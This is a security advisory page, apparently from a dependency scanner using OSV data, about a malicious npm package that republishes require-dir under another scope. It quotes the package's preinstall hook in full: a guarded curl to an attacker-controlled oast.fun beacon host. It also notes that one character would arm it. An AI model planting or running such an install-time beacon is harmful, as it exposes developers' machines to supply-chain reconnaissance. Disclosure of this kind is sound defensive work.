npm

@debile/require-dir @1.9.2

Vulnerability report · Last retrieved from osv.dev July 15, 2026 at 7:51 AM UTC

Malicious

OSV ID

MAL-2026-10654

Ecosystem

npm

Summary

Package @debile/require-dir republishes the code of the well-known require-dir package under a different scope. Its package.json preinstall script runs bash -c 'if [[ 1 == 2 ]]; then curl https://xgtktsypnmotaeqmgvdmsn0l1hg0yewow.oast.fun; fi' , which stages an Interactsh (oast.fun) out-of-band beacon in the install lifecycle. The curl is gated behind an always-false [[ 1 == 2 ]] guard, so no request is actually issued on install of this version, but the preinstall hook, the attacker-controlled OAST subdomain, and the scope-typosquat of a popular package (require-dir) together form a dependency-confusion / install-time recon probe. Flipping a single character in the guard converts the current release into a live install-time beacon to an attacker-controlled interaction server.

Source: amazon-inspector (3075732c05c8b941b57fed9e8fe9c788b28f9ff6fe9ef91936d1802f568c594e)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.